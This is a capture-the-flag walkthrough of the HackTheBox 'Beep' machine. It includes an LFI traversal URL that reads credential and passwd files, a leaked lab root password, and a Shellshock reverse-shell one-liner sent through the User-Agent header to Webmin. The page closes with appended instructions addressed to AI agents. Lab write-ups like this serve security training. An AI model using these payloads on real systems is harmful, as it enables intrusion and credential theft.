# Beep

### nmap: As usual let's start by scanning open services using nmap ```python nmap -sC -sV -oA beep 10.10.10.7 ```

### content discovery using gobuster : ```python gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error ```

if we browse to /admin it will promp as for the admin password if you dont have a password it will show this page

i couldn't go any further so i checked for elastix exploits using searchsploit

the one that seems to work is the LFI vulnerabiility let run the command `searchsploit -x ` to analyze the exploit

## Method 1 => LFI to RCE now let's vesit the exploitDB url to take a look at the exploit {% embed url="" %}

let's visit this path ```python https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action ```

reviewing the source code of this page reveals the admin password

we can use this password to login to the elastix login form now let's disclose /etc/password ```python https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action ```

now ssh to the beep box as the user root and the password we have found in the amportal.conf page **root : jEhdIekWmdjE** ```python ssh root@10.10.10.7 ``` ## Method 2 => RCE through Shellshock after doing nmap we found out that there is an open port on 10000 running Webmin httpd let's visit it: when we submit wrong credentials it shows the session\_login.cgi directory ![](/files/vgqbFux8laHr1HvfUrOf) cgi scripts use the Bash shell for processing user input were particularly susceptible to exploitation and there was a famous exploitation called shellshock which exploit cgi script to execute arbitrary code

so let's test if this cgi is vulnerable to shellshock attack let's capture the login submit using burp suite and replace the user agent value with a bash one-liner reverse shell shellshock payload ```python () { :;}; bash -i >& /dev/tcp// 0>&1 ``` before sending this request we have to start listening on the port we specified in the payload for me it was 443

and now let's send the request using burp

and we get back a reverse shell

hope you found this walkthrough easy to understand and follow Greeting From [Sayonara](https://github.com/ismail-arame) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/hackthebox/machines/beep.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.